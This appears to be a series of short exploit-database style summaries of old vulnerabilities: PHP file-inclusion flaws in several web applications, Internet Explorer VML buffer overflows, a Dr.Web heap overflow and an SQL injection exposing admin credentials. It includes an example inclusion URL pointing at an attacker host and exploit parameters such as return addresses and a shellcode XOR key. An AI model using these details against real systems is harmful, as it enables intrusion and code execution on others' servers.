SolidState version 0.4 is vulnerable to multiple include vulnerabilities. An attacker can exploit these vulnerabilities by sending a maliciously crafted HTTP request to the vulnerable server. This allows the attacker to include arbitrary files from the web server.
ProgSys is vulnerable to a remote file include vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, containing arbitrary code which is then executed on the vulnerable server.
Input passed to the 'GLOBALS[phpQRootDir]' parameter is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.
The flaw resides in the dix.php3 file, which contains this code: include($url_phpartenaire."/config.php3"); An example of the exploit is http://www.victime.com/(path)/dix.php3?url_phpartenaire=http://attacker
This exploit targets a stack-based buffer overflow in Microsoft Internet Explorer VML. It uses a heap-spraying technique to inject shellcode into the heap. It was tested on Windows XP SP1 + IE6 SP1, Windows XP SP0 + IE6, Windows 2000 SP4 + IE6 SP1, and Windows 2000 SP4 + IE6. It is not successful on Windows XP SP2 due to buffer overflow protection.
A remote file inclusion vulnerability exists in PowerNews v1.1.0 due to insufficient sanitization of user-supplied input to the 'nbs' parameter in the 'includes/global.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by sending a specially crafted HTTP request containing a malicious URL in the 'nbs' parameter.
This exploit works regardless of php.ini settings against MySQL >= 4.1 (allowing subs) and if the 'messages' module is enabled. It allows an attacker to inject malicious SQL queries and disclose administrative credentials.
A vulnerability in the AllMyGuests module and standalone version allows remote attackers to include arbitrary files via a URL in the _AMGconfig[cfg_serverpath] parameter to signin.php.
This exploit takes advantage of a heap overflow vulnerability in Dr.Web 4.33 antivirus for Linux. The vulnerability is triggered when scanning a specially crafted LHA file. The exploit uses a NOP sled and shellcode to hijack the GOT entry of realpath() and execute the shellcode.
This exploit is a public version of a 0day exploit for Internet Explorer VML Buffer Overflow Download Exec. It was tested on Windows 2000 Server CN with Internet Explorer 6.0 SP1. It is compiled with cl vml.c and the usage is vml <URL> [htmlfile]. It uses a NOPSIZE of 260, a maximum URL of 60, a DWORD ret of 0x7Ffa4512 for CN and 0x7800CCDD for all Win2k, a search shellcode, a download exec shellcode XOR with 0xee, an HTML header, and an HTML tail.